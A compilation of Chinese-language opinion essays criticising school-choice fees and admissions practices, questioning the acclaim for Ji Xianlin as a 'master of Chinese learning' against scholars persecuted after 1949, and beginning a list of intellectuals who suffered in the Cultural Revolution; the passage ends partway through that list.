小 学讲究“就近入学”。如果不想在划片的小学上学,而想到其他小学,那么,请交择校费(或者叫赞助费、捐资办学费等)。有些城市如广州,择校费是合法的,更 多的地方,择校费是默认的,或者叫潜规则。跟校方有关系的,少收一点,没关系的,如数缴纳;给校领导送礼到位,少交一些,不送礼或送礼无门的,如数缴纳。 不仅仅是重点小学,普通小学也收,只不过比重点小学收的费用低一些。有个朋友,孩子在划片的小学就读,只是因为他没有分立户口,是集体户口(其实是买了房 没迁户口),学校也非让他交2万元赞助费。反映到市教委,回答是:你可以告学校。朋友哪敢告啊,好说歹说,校长打了个5折,交了1万元赞助费。有同事建 议,给校长送几千块钱,也许赞助费就免了,但朋友宁愿给学校赞助费而不愿送礼。
好容易搞定了学校,刚喘口气,奥数来了。很多家长周末比平时 还累,因为要带着孩子奔走于各种辅导班,尤其是奥数班。有的孩子从一年级就开始上奥数班,有的晚一些,也有坚决不上的。到了小学高年级,有些家长为了多重 保险,就让孩子同时上几个奥数班,名曰“占坑”。除了民办培训机构举办的奥数班,很多重点中学附设的教育培训公司都有奥数班,家长们就让孩子同时参加几个 重点中学的培训班。为什么?因为很多重点初中往往优先甚至只是从它附设的培训班里录取学生。多参加几个培训班,就多了几次机会。当然,还有各种英语班、特 长班(琴棋书画唱等),因为初高中会招特长生,不赘述。这么多培训班都压在小学生稚嫩的身体,所以,学者杨东平说:“小学生是现在最最苦大仇深、灾难深重 的群体”。
熬了几年,迎来了“小升初”。今年5月初,北京市教委针对“小升初”发布通知,重申就近入学原则,除了推优生、特长生之外,严禁各中学组织任何形式的考试、测试和面试选拔学生。这实际上是企图堵住各重点中学(初中)借其附设培训班录取学生的渠道。
当 其时也,以央视二套为代表,发出了“打倒奥数”的呼声,家长应者云集。据说全国奥数产业的营业收入,保守估计每年达20亿元。既然奥数已形成了一个产业, 那么,围绕该产业就必然构成一条利益链。民营培训机构是利益链重要一环,重点中学附设的培训机构也是其中一环,自然,还有其他利益攸关方,亦不赘述。
“打 倒奥数”,意味着要斩断这条利益链,这必将遭致利益攸关方(或者说利益集团)的反抗,何其难也。重点初中,除了其附设培训班的利益输送,还有一个升学率的 问题。重点不重点,关键还是看学校的升学率,师资是一方面,更重要的是生源。优质生源从哪里来?推优生只占极小一部分,当然不能靠就近入学的学生了,所以 还得通过其他方式选拔。既然教育主管部门有令,公开考试、测试是不能搞了,那就悄悄考吧。一位孩子正读小学六年级的朋友,年初以来,参加了三所中学悄悄组 织的考试,其中一所学校就考了三次(他也不明白同一所学校为何要组织三次考试),而且是前一天短信通知,第二天就考试。第一次甚至不告诉你是哪个学校通知 的,“到时候就知道了”;另外一次,短信里只说是培训班结业测试。
假如你读六年级的孩子学习成绩很不错,但推优没被录取(推优是另一个相当 痛苦的过程,暂不表),也错过了学校组织的神秘考试,或者考试了没被录取,怎么办?如果实在不想就近入学(所谓电脑派位),那就交择校费吧。择校费交多 少?各校标准不同,也与能否找到关系或门路有关,也许校长一句话、一张条子就减去一半(说句不中听的话,黑暗里送来的礼金收还是不收,这对校长也是一种残 酷的道德良心考验)。去年,某家长给北京某著名中学交了15万元,学校一直不说录取不录取,这位家长的心悬在空中飘啊飘,不过,最后总算拿到了录取通知 书。
中考,是统一考试。有的孩子平时学习不错,但临考发挥失常,比重点高中录取分数线少了几分。怎么办?有的重点高中不成文的规则是,差一 分交一万元。只要稍有条件的家长,想着就这么一位孩子,都会咬咬牙,交了。顺便说一句,北京的家长是全国各大城市最听话的,说交多少就交多少,基本不还 价。连上课外辅导课都是如此。高中名校老师课外辅导每小时300元,高三400元,北京一位重点中学老师说,从未遇到家长还价的,但他在上海亦做中学教师 的同学却经常要跟家长讨论辅导课的价钱。
很多专家说,教育资源的不均衡,是产生择校及择校费的根源。这当然有道理。而熨平教育资源,全世界 都是一个难题。从实际观察,义务教育阶段,实行就近入学,“打倒奥数”,禁止通过考试选拔学生,不是治本之策。主要还在于,择校费的后面存在巨大的寻租空 间。利益所至,潜流奔涌,堵是堵不住的,抓也抓不完的。非唯教育产业如此,只是因为教育关系每个家庭,所以怨诽尤多。在现有中小教育体制之下,学生和家长 们的苦日子就得继续。因此说,这是可怕的中小学教育。
教育资源不均衡的弊端,或者说择校费的可恨,说起来颇有些年头了,但一碰到教育体制这堵墙壁,只有却步。前些时候不是说国家要推行新的教育体制改革么?还向全社会公开征求意见,被舆论闹得沸沸扬扬的却只是缩微到高中要不要分文理科。
我不是教育专家,不敢对“教改”妄提意见。但由于有切身体会,针对中小学教育,尤其是“小升初”,还是想发出一点声音:
第一,修改义务教育法。义务教育阶段就近入学,是义务教育法的规定。建议取消就近入学的规定。
第二,小升初也实行统一考试(类似中考、高考),学生填报志愿,学校根据考生志愿和成绩录取。但统考成绩和平时成绩(1至6年级各科考试成绩均实行百分制)各占一半。
第三,教师工资比照公务员工资,在此基础上,实行教师轮岗制。每个区划成若干个学区,每位小学和中学教师在所在学区内每6年强制性轮换一次。因为是在同一个学区,上班距离的远近大致差不多,学区轮岗不构成师资流失的充分理由。
第四,取消民办公助学校,扶持发展优秀民办学校。民办学校向学生收取一定学费。政府按招生人数拨给专项资金在民办学校设立奖学金,抵免优秀学生的学费等。
第五,包括民办学校,任何学校严禁收取任何名目的择校费(赞助费)等,否则,民办学校取消办学资格,公办学校校长一律免职,其中贪污挪用择校费者送交司法机关。
核 心一点,既然无法改变,那就干脆承认教育资源不均衡的现实,成绩好的学生允许报考其心目中的重点中学(我国台湾地区也曾取消过重点中小学,但很快就恢复 了),按分数高低录取。至于在此基础上如何发展普通中小学,不在本文讨论范围。何况,教育专家说,只有差的学校,没有差的学生。
再说一句现实的话,修改义务教育法短时间内恐怕不容易,那么,择校费明码标价,纳入专户管理,同时各校录取学生名单及其择校费向全社会公开,每年均进行专项审计,可乎?
至于整个教育体制的改革,涉及的不仅是教育一己之事,决策层非痛下决心则难取跬步之功。

1949年后的“国学大师”

北京大学东语系原主任季羡林教授因年事高迈辞世,大陆学界、政界掀起季羡林热,从总理温家宝、所有媒体以及凡与季羡林有一点关联者,皆誉其为“国学大师”,以至喋喋不休说、反反覆覆颂、曲不离口唱。
藉此机会,我化了点时间,查阅了1949年后尚活在大陆又死在大陆而与国学沾亲带故的著名学人,与季羡林予以对照,以为“国学大师”说留一点民间底层者或曰野史的声音。
我将这些人物分四组:遗老类、社会类、御用类、另类。分法不严格,故妄听之。
第一组:
尚秉和、余嘉锡、唐邦治、张国淦、朱师辙、岑仲勉、邓实、马衡、柳诒征。
第二组:
马 一浮、陈寅恪、熊十力、汪东、顾颉刚、吕思勉、冯友兰、胡少石、钱基博、金毓黻、马叙伦、邓之诚、梁漱溟、陈序经、姜亮夫、汤用彤、刘文典、唐 兰、吴宓、高亨、朱谦之、潘光旦、郑振铎、罗尔纲、张申府、钱钟书、钱仲联、黄现播、雷海宗、王重民、周予同、陈梦家、向达、程千帆、金兆梓、罗尔纲、蒙 文通、金岳霖、缪凤林、谬钺、徐中舒、徐梵澄、杨向奎、阎宗临、张舜徽、严北溟、夏鼐、吕澄、吕叔湘、王力、夏承焘、王利器、苏渊雷、纳忠、季羡林、马 坚。
第三组:
郭沫若、陈垣、白寿彝、杜国庠、范文澜、翦伯赞、吴晗、任继愈、侯外庐、吕振羽、沙文汉、周一良、周谷城、尚钺、俞伟超。
第四组:文怀沙、翟鸿燊。
遗 老类中的柳诒征是历史学家、古典文学家、图书馆学家、书法家,后人誉其为中国近现代史学先驱、中国文化学奠基人;惜乎1949年后不为世用,晚年居沪以读 书校书为乐,卒于1956年,寿76岁。马衡曾任故宫博物院院长19年,1949年后留任,1955年辞世。其他人如尚秉和、余嘉锡、唐邦治、张国淦、朱 师辙、岑仲勉、邓实诸位,都是生于清末而成名于民国故世于5、60年代者;如岑仲勉,生于1885年,比陈寅恪还大5岁。陈寅恪阅岑文后致信陈垣褒扬岑 曰:“此君想是粤人,中国将来恐只有南学,江淮已无足言,更不论黄河流域矣。”岑于1961年因病去世。遗老类学人虽学养深厚,但总是“两耳不闻窗外事, 一心只读圣贤书”,与政治无关,或曰不为政治所用,又死得早,大陆政要以至学界,无论当时的,遑论现在的,早就把他们忘得一干二净:“国学大师”名号即曾 与他们有缘,也只是留在了他们的著作文字里了。
马一浮,论者谓与梁漱溟、熊十力齐名,然梁往访湛翁时,自称后学,执师礼:梁由湛翁弟子乌以凤引进门,“谒先生于延定巷。入门,梁先生长揖下拜,表示尊敬之意。”梁漱溟对熊十力有知遇之恩,熊曾从学于梁;可见马一浮之学深之位尊之德高望重。
梁 启超说清代读书人“后辈之谒先辈,率以问学书为贽。——有著述者则媵以著述。——先辈视其可教者,必报书,释其疑滞而奖进之。”熊十力持《新唯识论》求见 马一浮。湛翁读后大加赞赏,遂资助出版。马一浮也赠书梁漱溟:1921年梁马初识,马一浮以两部木版刻字重印的古籍相赠,一部是宋儒杨慈湖的《先圣大 训》,另一部是明儒罗近溪的《旰坛直诠》。梁漱溟说自己读后受益不浅而深爱之。1922年,梁漱溟书写了一条幅:“毫忽不能昧斯须不敢瞒——春日读近溪集 有省”,装裱起来,悬于室内以自勉自励。
李叔同长马一浮三岁,又剃度出家,成为一代大德高僧,却在佛学方面一直把马一浮视作良师,真诚推崇 马一浮。李叔同对他的学生丰子恺说:“马先生是生而知之的。假定有一个人,生出来就读书,而且每天读两本(他用食指和拇指略示书之厚薄),而且读了就会背 诵,读到马先生的年纪,所读的还不及马先生之多。”湛翁之学养若此。
马一浮不卑不亢,深得中庸精髓。与湛翁并世者,郭沫若甘卑,冯友兰偶 贱,梁漱溟过亢,陈寅恪甚傲。至若马一浮,则卑亢得宜,无论对蒋介石、毛泽东、周恩来以及自居弟子执礼甚恭的元帅陈毅,皆应对裕如;得失宠辱,平常淡然超 然,去狂狷,远乡愿,又绝无失礼之举,若羚羊挂角,如天衣无缝。马一浮似乎从未作过什么检讨。其人品其处世若此。
乡先贤王敬身是马一浮入室弟子。师弟唱和,传为佳话。王敬身公子王策现居西班牙,书房中悬挂湛翁赠乃父诗的书法条幅,其字冲淡,已臻化境。笔者每访王君,总要瞻读留恋湛翁墨宝前。
就 是这样一位国学大师,1967年文化革命中,史无前例地在杭州寓所被活活地折磨死了。“抄家者席卷而去之前,他恳求道‘留下一方砚台给我写写字,好不 好?’谁知得到的却是一记耳光。”无产阶级革命与专政是专门毁灭国学和国学大师的。马一浮深谙国学精髓而不明阶级斗争奥妙。湛翁自知不久人世,留诗《丁未 (一九六七)告别诸亲友》:“乘化吾安适,虚空任所之。形神随聚散,视听总希夷。沤灭全归海,花开正满枝。临崖挥手罢,落日下崦嵫。”湛翁绝笔与老友弘一 法师临终偈语:“悲欣交集”异曲同工,都是那么平和而安适达观,相侔庄子“齐生死”的境界。
陈寅恪是清华国学四钜子之一,另三位是王国维、梁启超、赵元任,不幸或早死了或死在美国,独陈寅恪有幸活在了1949年后大陆的“新中国”至1969年文化大革命“盛典”。
陈 寅恪学贯中西,见远识卓,在清华讲课时,名家吴宓、朱自清、冯友兰都来旁听。吴宓说:“宓于民国八年在美国哈佛大学得识陈寅恪。当时即惊其博学,而服其卓 识,驰书国内诸友谓‘合中西新旧各种学问统论之,吾必以寅恪为全中国最博学之人。’今时阅十五、六载,行历三洲,广交当世之士,吾仍坚持此言,且喜众之同 于吾言。寅恪虽系吾友而实吾师。”曾面斥蒋介石“你是军阀”、恃才傲物的狂生刘文典说:西南联大文学院真正的教授只有两个半。刘算自己半个。“陈寅恪才是 真正的教授,他该拿四百块钱,我该拿四十块钱……”。胡适之在自己的日记中说:“寅恪治史学,当然是今日最渊博、最有识见、最能用材料的人。”在北大图书 馆扇过毛泽东一个耳光的傅斯年说:“陈先生的学问近三百年来一人而已。”
1949年后,北京硬要陈寅恪从广州北上来主持中科院的历史研究 所,郭沫若还不愿意屈居第二,处心积虑地设置了一个研究中古史的“第二历史研究所”,所长之职虚位以待陈高就。陈寅恪以白纸黑字回应曰:“允许中古史研究 所不宗奉马列主义,并不学习政治。”“请毛公或刘公给一允许证明书,以作挡箭牌。”“我认为最高当局也应和我有同样看法,应从我之说。否则,就谈不到学术 研究。”这却如何使得!于是,陈寅恪留在了广州中山大学。1961年,郭沫若还两次登门拜访陈促驾不果。
郭沫若1961 年3月13日日记:“同乃超去看陈寅恪,他生于庚寅,我生于壬辰,我笑说今日相见是龙虎斗,伊左目尚能见些白光,但身体甚弱,今年曾病了好久。胃肠不好。 血压不大高。”郭氏1961年11月15月再访陈寅恪,记曰:“‘壬水庚金龙虎斗,郭聋陈瞽马牛风’。渠闻此联解颐,谈约一小时,看来彼颇惬意。”
好 事者将此联演绎为郭沫若与陈寅恪斗才对联的故事。郭氏问陈生辰后,出上联“壬水庚金龙虎斗”,壬水、庚金分指郭陈生辰,龙虎乃郭陈属相。陈即应口对出下 联:“郭聋陈瞽马牛风”,以郭重听陈失明的生理特点巧对,更妙的是“马牛风”对“龙虎斗”,直是绝对!其实,这副对联是大才子郭沫若化了半年时间想出来 的。郭氏自诩宗奉马列,暗指陈氏为“牛”,隐含“对牛弹琴”之讽,不可谓不高明。郭氏是否有对陈寅恪卖弄之意,不便遽断,但不怎么服气则是自我坦言的: “我笑说今日相见是龙虎斗”。坊间如此别开生面变异传此文坛佳话,褒陈贬郭之意显矣。
1969年,陈寅恪在文化革命中遭批斗至死,死前从床上爬起摸索着(已完全失明)欲寻一口水喝不得而倒毙床脚边。
季 羡林的国学大师与马一浮、陈寅恪的国学大师自然有距离。季羡林擅梵文、巴利文,学有专长,但冷僻,极冷僻,赞其“国宝”或当,誉其“国学大师”则过。季生 前曾专门郑重其事地声明辞去“国学大师”连带“学界泰斗”、“国宝”三大帽子。这是自知之明。凡学问,到了一定境界就能流转相通。季氏是一流学者,岂不明 是理,明白无误的被人当猴耍而遗世笑柄!奈何当局和学界需要他来充当国学大师。在当局是政治需要;在学界是不学驱使。
除马一浮、陈寅恪外,上列社会类学人或通才或专业,都不下于季羡林。试随便捡出几位一叙。
胡 少石是文字学家、文学家、史学家、书法家、艺术家,于古文字、声韵、训诂、群经、史籍、诸子百家、佛典、道藏、金石、书画,以至辞赋、诗歌、词曲、小说、 戏剧,无所不通,尤以古文字学、书学、楚辞、杜诗、文学史最为精到,著作等身。胡少石学问成就绝大部份在1949年前。胡小石不事权贵。1946年总统蒋 介石60寿辰,朝野各色人等竞相献礼。有一“民意机构”派人请胡少石撰写寿文,胡少石一口回绝。来人曰:“前时美军将领史迪威逝世,公祭典礼上的祭文,不 是先生写的么?”胡答道:“史迪威将军来中国帮助我们抗战,所以我才为他写祭文。再说,我只会给死人写祭文,不会替活人写寿文。”胡生于1888 年,1962年死在大陆,那些年,全国大饥荒,饿殍遍野。胡少石死后,其在联合国任职之长子胡令德回大陆奔丧,欲将父亲书诗集带到香港影印出版而未能带 出。此后胡次子为先父编成诗词全集,寄往中华书局,中华书局以政治原因退稿。未几,文革骤起,书稿遭毁。笔者想查明胡少石究竟是怎么死的,竟然搜索无着, 介绍胡少石的文字仅得寥寥数百字。这样一位道地的国学大师,人们早就把他忘到九霄云外了。
史学界四大右派向达、陈梦家、雷海宗、荣孟源。
向达学贯中西,是著名的敦煌学、中外交通史专家,曾任北大历史系教授、北大图书馆馆长,1954年中科院哲学社会科学部学部委员;1957年遭整肃为右派,1966年底文革中,逃不过一死,66岁,比季羡林大11岁。
陈 梦家师从闻一多、徐志摩、钱穆,专长考古学、古文字学、诗歌。1949年后,从海外投奔祖国,却在50年代初三反五反运动中就遭整肃,诬其贪污;1957 年说了句“文字改革宜慎重”,被划为右派,沦为贱民;文革期间强迫他长跪在院里,被人吐口水,罪状是攻击革命烈士闻一多“不洗澡,不换衣服,身上臭得要 命”。闻一多陈梦家诗人浪漫,师徒情深,相互调侃揶揄,佳话多多;未料史无前例的文化大革命严肃正经得要命,陈梦家平素打趣笑谈乃师的玩儿话差点要了他的 命。1966年8月24日陈梦家服药自杀未果,同年9月3日,终于死成了,得以解脱。其死状为自缢,或曰遭被打死后伪装成自杀,死年55岁,与季羡林同 庚。
雷海宗有“声音如雷,学问如海,史学之宗”的美誉。潘光旦赠诗:“不争两字见平生,全部工夫铸史成。”奈何平生不争,也躲不过地网天罗罩定,1957年雷遭整肃为右派,沦为贱民,幸1962年早死,免罹文革之辱。雷比季羡林大9岁。
荣孟源,是中共培养的历史学家,协助范文澜宣传马克思列宁主义历史观,1957年难逃一劫,文革中落入地狱,批倒斗臭;1985年故世,72岁,比季羡林小2岁。
史学界四大右派与季羡林是同代人,治学专业不同。其中陈梦家堪与季羡林一议。
陈、 季文革时都是55岁,过了知天命之年,应该不会如青年学生那样受惑冲动了。陈梦家因有前科,“男儿脸刺黄金印”,无论他有多大的学问,都是“越多越反 动”,注定了没有好下场。季羡林则投身革命大潮,成了文化革命中的弄潮儿。季原先在当红人物聂元梓与对立派之间摇摆,一时跑到“新北大公社”献慇勤,一时 又泡在对立派中套近乎,最后咬咬牙参加了“井冈山”,当了头头,那时称“勤务员”,还是“一号”的。这恐怕是文化革命中著名学者中唯一的景观。不仅是学者 教授不被视为“反动学术权威”、“牛鬼蛇神”是唯一的,55岁的教授成了造反派头头也可能是唯一的。虽然季羡林时与聂元梓同派,时又对立,但这正与聂元梓 时造反时保皇在本质上是相同的,都是响应伟大领袖毛主席的号召,积极参加文化大革命。追溯起来,聂元梓苗红根正,造反有理;季羡林半路出家,脱胎换骨,又 红又专。可谓走殊途欲同归。——季羡林在北大1957年反右运动中是积极份子,抓批打右派份子十分进步;1964年社会主义教育运动中也异乎寻常的前卫, 反对校长陆平。彼时,季羡林是北大东语系的教授、系主任。东语系另有一位教授马坚,回族,也是国宝级人物,曾赴开罗求学,以阿拉伯语撰写了关于中国伊斯兰 的书籍,并把《论语》诸中国文化书籍翻译成阿拉伯语。1957年,马坚遭整肃为右派。这段历史,笔者得之于一位尚健在的口碑甚佳的北大学生右派。现在季羡 林的档案资料(当然指在网上能查到的),对1957年的历史回避了,1964年社教中反陆平一节则被写进简历中。是因为社教运动是刘少奇王光美领导进行的 因此是正确的?我不明其中究竟奥妙,只是照录这段史实罢了。有一点则是明确无误的:有此渊源,季羡林在文化革命中,以著名学者教授也就是牛鬼蛇神之身一变 而为造反组织的一号勤务员,铸就了史无前例的文革中可能绝无仅有的一道反向景观,于季氏自己而言,也就顺理成章、自然固然了也。
季羡林与聂 元梓有互相揭短的文字,恰曝露了季和聂的真实。有论者曰:聂元梓“大作辩解,越描越黑”。其实,季又何尝不是。以大师级学者骂聂“破鞋”,恐怕不怎么像 话。聂元梓即便真曾有婚外情,就非要不问青红皂白等同于辱骂为市井间的“婊子、破鞋”么?季还说过什么:我可以有一千种方法报复那些整肃批斗我的人,但是 我不云云。打手拳师、村夫怨妇如此思维,可以说是高境界了,季在思想人品层面上,与打手拳师、村夫怨妇同。作为一流学者、洞明世事的长者,季在文革中的投 机行径以及以后反思的浅薄和诿过饰非甚至泼妇骂街都只能让人让历史宽恕他。
季羡林回忆文字中说当时吹捧江青和聂元梓的大字报铺天盖地,措辞 造句令人作呕(大意)。这是很准确的回忆,意思也是很正确的;因为当时全中国以至全世界人民心中最红最红的红太阳毛泽东全力表彰褒扬聂元梓,江青则是毛的 夫人,是文化革命伟大的英勇的旗手。现当今大陆对国学大师季羡林的仰慕崇拜张扬宣传不是彼时北大大字报可比了,所有的纸媒、电台电视网路、手机短讯,一座 立体的多维的媒体王国正盖地铺天地展开这场活剧;这是因为总理温家宝三探季羡林,这是因为60年文化的沉沦堕落,国民全体未明何谓国学、何谓国学大师。这 些捧吹的令人作呕的话语文字闹剧,从1966年季羡林发现的开始,延续至今,愈演愈烈,还会继续下去。党文化不除,永无宁日!
陈梦家、季羡林这两位同龄的一流学者人生道路迥异若此。
向达、陈梦家、雷海宗、荣孟源四位不是上列名单中佼佼者,较此四位资历学养人品成就深邃且高者比比皆是,都可以名副其实地跻身国学大师行列,最起码是他们专业的大师级学者。
马叙伦早在蔡元培长北大时期,就与马寅初有“二马”之称,名重当时,非独文字学上造诣甚高,书法艺术亦独树一帜。1949年后是第一任教育部长,因年高德劭,破例得毛泽东特准不用每天坐班。
梁漱溟以中学学历,24岁就聘北大哲学系,比胡适之年轻一岁;冯友兰、顾颉刚、王昆仑、朱谦之、朱自清、谭平山、张国焘都是他班里的学生。
吕思勉与钱穆、陈垣、陈寅恪并称“中国四大史学家”。
汤用彤、吴宓是与陈寅恪并称“哈佛三杰”者。
熊十力、顾颉刚、刘文典、邓之诚、朱谦之、潘光旦、张申府、罗尔纲、陈序经、姜亮夫诸位皆学富五车,各擅专长。
钱基博是钱钟书老子,非父以子贵,乃有其父必有其子。
余者除学问与上述诸大师相埒外,另有一大同小异者:不是1957年反右遭整肃沦为贱民,就是文化革命中受践踏蹂躏批判斗辱,或伤或死或幸存。伤者,妻离子散;死者,家破人亡;幸存者,历尽捶楚,九死一生。所有大师级学问,“越多越反动”,遭际越苦辛越惨酷。
现在来看看御用类者。
郭沫若新诗坛祭酒,考古、戏剧、书法皆为大家,当之无愧的大师级学人,当然也是花瓶首座,官封副总理,爵至终身全国文联主席、中国科学院院长。输诚堪称第一,赏赐无以复加,文化革命中仍遭批判,其子自杀、下狱,仅以身免斗辱。
陈垣资历人品成就皆上上乘,毛泽东御赐“国宝”,尊以“师”称;原虚位以待陈寅恪的第二历史研究所所长之职是陈垣接任的;惜乎1959年加入中国共产党后,身不由己,十余年间,大师专写短文(20余篇),天人交战,至1971年91岁时遭批判斗辱至死。
与陈垣相映成趣者冯友兰。冯陈学养相当,陈垣无奈整卖,冯友兰投机零售;幸冯只在批林批孔运动中卖三五年,其一以贯之的的哲学思想尚得存大半璧。
范文澜、吕振羽、杜国庠、翦伯赞、吴晗、侯外庐、沙文汉、周一良诸位系中共党培养的学者,都有大师级的真才实学,除周一良外,都是共产党员;诸位的人生结局却只有不是共产党员的周一良得善终。
范 文澜着《中国通史简编》,延安时代就被作为中共党内教科书。文化革命中,范的处境类郭沫若,毛泽东视需要一会儿保他,一会儿耍他。范遭冲击批斗,1969 年赉恨以殁。范死后开展的批林批孔运动中,毛还点名鞭尸。1973年7月3日毛泽东说:“我正式劝同志们读一点书,免得受知识份子的骗”,哪些“知识份 子”呢?他老人家接着说:“什么郭老、范老,任继愈、杨柳桥……”。
吕振羽,中国马克思主义历史学家,着《简明中国通史》,与范文澜齐 名;1949年后任吉林大学校长,当选中科院哲学社会部学部委员;1963年因叛徒嫌疑下狱,文化革命二度入狱,8年囹圄,身致重残,狱中高呼口号 “打倒托匪陈伯达!”遭审讯800余次。1980年1月平反,7月故世。
翦伯赞,维族人,1937年加入中国共产党,北大副校长、历史系主任;文革中翦伯赞夫妇不堪精神和皮肉斗辱之惨酷痛苦,双双仰药自尽,遗体口袋里装着“毛主席万岁!万万岁!”的字条。
杜国庠,1916年留日时从河上肇教授接受学习马克思主义,30年代加入中国共产党;因有被捕史,1949年后不得重用,幸于1961年去世,免遭文革之辱。
吴晗,清华大学教授,北京副市长,早年加入民盟,又加入中共,明史专家,为中共写了许多文章剧本;文革中以《海瑞罢官》和《三家村札记》见罪,遭数百次批判斗辱,跪玻璃渣,流沙灌颈,头发拔光,唾沫淹身,1969年狱中自杀,妻儿惨死,家破人亡。
沙文汉,浙江省长、浙大校长,1925年加入中共,1957年遭整肃为右派后致力历史研究,1964年病故,免遭文革斗辱。
候 外庐,翻译《资本论》,所主编的《中国思想通史》被誉为“我国第一部用马克思主义观点系统总结几千年思想遗产的巨著”。人或曰候系翻译《资本论》起家,候 自白:从《资本论》吸取的营养,一生受用不尽,其实是《资本论》永远引导着我前进。文革中候遭批判斗辱,幸未死,1987年病故。
周一良, 曾从学邓之诚、陈寅恪,得陈赏识;1946年从哈佛毕业返国执教于清华北大。文化革命中周积极参加“梁效”写作组,成为毛泽东江青文化大批判主要打手之 一。文革结束后,周遭整肃,悔罪有术,辩解有方,改换门庭,继续效劳,安然无恙,依旧荣华;2001年以88岁高龄寿终正寝。
谷城,早年与毛泽东同事相友善,治通史,任教复旦历史系,名闻天下;文革中遭批斗,扫厕所,得毛泽东解救,载诗载歌颂圣,最高官阶至全国人大副委员长。
白寿彝,1949年和郭沫若创办中国史学会,负责主编的《中国通史》于1999年出齐12卷22册1400万字。时任中共总书记的江泽民致信贺。白氏1957年加入中国共产党,是年55万读书人被打成右派,沦为贱民。文革中,白氏仍遭整肃批斗厄运。
任 继愈,宗教史家。梁漱溟说:“任继愈不行。任写了篇文章评论宗教的,也可以说是诋毁宗教的。毛看到了,也许是送给他看的。毛大为欣赏,马上成立宗教研究 所,派任继愈当所长。所长不能光杆一个,要网罗一批人,我记得我一个最熟的朋友叫朱谦之的被拉去参加这个宗教研究所。”梁漱溟无论年齿资望学养皆为任的师 辈甚或太师辈,如此在私人场合评骘任,并不越轨而中矩合范。文革中任遭整肃批判斗辱,下放河南信阳五七干校劳动改造,右眼失明,左眼视力严重受损。任对文 革经历噤声未言。文革后,任大红大紫,以任名义领导、整理、编纂的大部头史籍动辄上亿字,“《中华大藏经(下编)》预计2-3亿字、《中华大典》预计7亿 字”。笔者见过任参与主编的《中华人民共和国日史》50卷,其实是党史非国史,于五十余年间的诸多重大历史事件、人物语焉不详,多有略而不记或涂抹修改不 实者。任与季羡林同日去世,小季5岁。
由于查阅资料,得悉2006年大陆有评选国学大师活动,选出“我心目中的十位国学大师”,如次:王国维、钱钟书、胡适、鲁迅、梁启超、蔡元培、章太炎、陈寅恪、郭沫若、冯友兰。收到选票1242993张,状元王国维得票68890张。
候 选国学大师五十位,如次:俞樾、孙诒让、杨守敬、王先谦、刘师培、严复、沈曾植、王国维、辜鸿铭、廖平、黄侃、章太炎、鲁迅、钱玄同、吴梅、罗振玉、蔡元 培、沈兼士、傅斯年、余嘉锡、柳诒征、吕思勉、胡适、汤用彤、陈梦家、马一浮、熊十力、张君劢、蒙文通、陈寅恪、范文澜、陈 垣、郭沫若、唐君毅、顾颉刚、吴宓、赵元任、徐复观、金岳霖、王力、高亨、夏承焘、梁漱溟、钱穆、冯友兰、任中敏、牟宗三、钱钟书、梁启超、康有为。
提出候选名单者是“冯其庸、汤一介、庞朴等专家”。我震惊于国学大师也时髦到可以像选歌星、美女似地让“粉丝”挑三拣四,但一想到还有另类的“国学大师”,也就见怪不怪了。
最后略述另类的文怀沙、翟鸿燊。
文怀沙学楚辞,网上有关他的文字很多:年龄假,“寡人有疾”真,学楚辞模糊,应该已见分晓。这也不应抓住不放,毕竟有些是隐私。只是反过来以道貌岸然欺人 惑世,与非专家大师而以专家大师欺人自欺自况自喻自诩自娱同,则不免品下下。这与有真才实学因政治故而别样面世是不能相提并论的。
翟鸿燊据网上介绍,是位教人赚钱的大专家,无论如何拐弯勉强,也与国学大师相隔十万八千里,怎么就能异口同声地牵扯上了呢?请看他的头衔:北京支点未来管 理谘询公司特聘高级培训讲师。中国行销实战训练导师,国学实践应用学家,经济与文化学者,北京大学客座教授。现任道昂国际集团董事长、中国国际人才工程学 院院长、DAM行销拓展机构总裁、北京大学中国企业家训练中心总监、中国经营报专家顾问团首席顾问、美国国家大学荣誉教授博士生导师。
百思不解!突然想到,张培莉因为专营宝石,戴上了“中国著名地质学家”桂冠,上了大陆“百度百科”和海外“维基百科”的中国地质学家榜。“百度百科”如是 曰:“张培莉,温家宝总理夫人,(1943年—),比温小一岁。甘肃兰州人,兰州大学地质地理系毕业。中国著名地质学家,曾担任中国珠宝协会副主席、中国 宝玉石鉴定委员会主任、国家珠宝检验中心主任等职务。”
不解,一思也不思了。罢了!
刚将大师级的学人从泥潭地狱中拉上来,开始还原其常生态,就急匆匆走向了另一极端——尽人皆大师的最有钱或最不值钱了。
1949年后,中国大陆国之不国,世之不世,学之不学,人之不人,亦至矣。国学大师九泉有知,然后学小子言乎?呜呼哀哉!

中华儿女蒙难系列

顾准
1957年第一次提出社会主义市场经济理论,两次被打成右派,与共患难30多年的妻子被迫离婚并含恨自杀,五个子女宣布 断绝关系并断绝来往。仍坚持独立思考,在绝对权威笼罩一切的年代依然敢于说不。曾说,民主不能靠恩赐。他是“拆下肋骨当火把照耀前路”的顾准。顾准临死前 为了见孩子一面而屈服签字,结果孩子还是没有一个前来。人之所哀,莫过于此。他妻子把他的手稿全部浸湿撕毁,冲入下水道,因此获罪,服消毒剂自杀,死状甚 惨。
卞鉴年
生物学家,曾任天津南开大学生物系系主任,文革中被打倒,遭遇持续的“斗争”和“审查”,关进“牛棚”,受尽种种侮辱和折磨,不久后投湖自尽,年仅43岁。
文革惨案
1966 年8月:在上海复兴中学,学生用锤子打老师的头,一位教师的头盖骨被打得凹陷下去,一直不能恢复,金志雄老师自杀,她被剃阴阳头时,学生用很钝的剪刀,头 皮被扯掉。上海市三女中已经退休的老校长薛正在打扫厕所时被强迫吃屎尿,有学生用图钉扎进皮肉,把大字报直接钉在她的背上(《文革受难者》)
饶毓泰
中 国物理学界泰斗。1921年获普林斯顿大学硕士学位,1922年获哲学博士学位。后创办南开大学物理系。1949年,老师胡适约他离开大陆,他拒绝。三反 运动时,他最得意的弟子在大会上指责他主张“赶上世界学术水平”是自私自利思想。文革中他表示学术问题不能一概否定,遭迫害,1968年10月上吊身亡。 因为众多学者不愿离开,胡适曾老泪纵横地对司徒雷登说,抗战胜利后,他只知道研究自己感兴趣的学术,放松了思想战场上的努力。于是,胡适为《陈独秀的最后 见解》作序,揭露了极权政治的本质。
黄国璋
